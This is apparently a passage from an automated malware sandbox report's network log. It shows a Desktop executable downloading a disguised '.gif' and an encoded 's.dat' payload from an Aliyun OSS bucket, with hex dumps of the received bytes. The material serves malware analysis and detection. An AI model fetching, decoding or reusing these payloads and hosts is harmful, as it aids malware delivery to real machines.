                                              2025-01-05 09:11:28 UTC3035INData Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0
                                              Data Ascii: L]y%-/cZ<+Xd}_h48a*7?79:dOtLO2/uR& PeY e@l*UO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.66277539.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:29 UTC111OUTGET /d.gif HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:29 UTC547INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:29 GMT
                                              Content-Type: image/gif
                                              Content-Length: 3892010
                                              Connection: close
                                              x-oss-request-id: 677A4CC19932F13535F350C6
                                              Accept-Ranges: bytes
                                              ETag: "E4E46F3980A9D799B1BD7FC408F488A3"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:53 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 3363616613234190325
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 5ORvOYCp15mxvX/ECPSIow==
                                              x-oss-server-time: 25
                                              2025-01-05 09:11:29 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                              Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                              2025-01-05 09:11:29 UTC4096INData Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4
                                              Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V|
                                              2025-01-05 09:11:29 UTC4096INData Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f
                                              Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
                                              2025-01-05 09:11:29 UTC4096INData Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95
                                              Data Ascii: -J;wuwu{}uG`uWu{Q6
                                              2025-01-05 09:11:29 UTC4096INData Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33
                                              Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v|}ThkcJ{K-{u)%|!Q;b:Bmyv)B0.xfcI9a/}pb"3
                                              2025-01-05 09:11:29 UTC4096INData Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50
                                              Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
                                              2025-01-05 09:11:29 UTC4096INData Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79
                                              Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
                                              2025-01-05 09:11:29 UTC4096INData Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4
                                              Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cg*Onx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M*>zvGKV?oJy_y@)5f)KBzyt=U%G}}
                                              2025-01-05 09:11:29 UTC4096INData Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7
                                              Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
                                              2025-01-05 09:11:29 UTC4096INData Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64
                                              Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.66277639.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:37 UTC111OUTGET /s.dat HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:38 UTC560INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:37 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 28272
                                              Connection: close
                                              x-oss-request-id: 677A4CC95A53BB303200AE91
                                              Accept-Ranges: bytes
                                              ETag: "85C558B2E6A863EF997650572603558A"
                                              Last-Modified: Sun, 05 Jan 2025 09:06:01 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 16094947486928981281
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000113
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: hcVYsuaoY++ZdlBXJgNVig==
                                              x-oss-server-time: 2
                                              2025-01-05 09:11:38 UTC3536INData Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40
                                              Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
                                              2025-01-05 09:11:38 UTC4096INData Raw: 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86
                                              Data Ascii: _##V'3+f*~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{*m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
                                              2025-01-05 09:11:38 UTC4096INData Raw: 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc
                                              Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
                                              2025-01-05 09:11:38 UTC4096INData Raw: 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41
                                              Data Ascii: 0JY9sEAOyv1|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4|4%A}bkkkkEv|sJ"KKKKD\@NKSA
                                              2025-01-05 09:11:38 UTC4096INData Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce
                                              Data Ascii: ((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
                                              2025-01-05 09:11:38 UTC4096INData Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                              Data Ascii: ,$LDld=5}u]U
                                              2025-01-05 09:11:38 UTC4096INData Raw: 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2
                                              Data Ascii: G<EB`."+LVpfVgUo0|\~:KbkY5xCM$8^330021228SXOBIFe-
                                              2025-01-05 09:11:38 UTC160INData Raw: bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 78 6f 9a 07
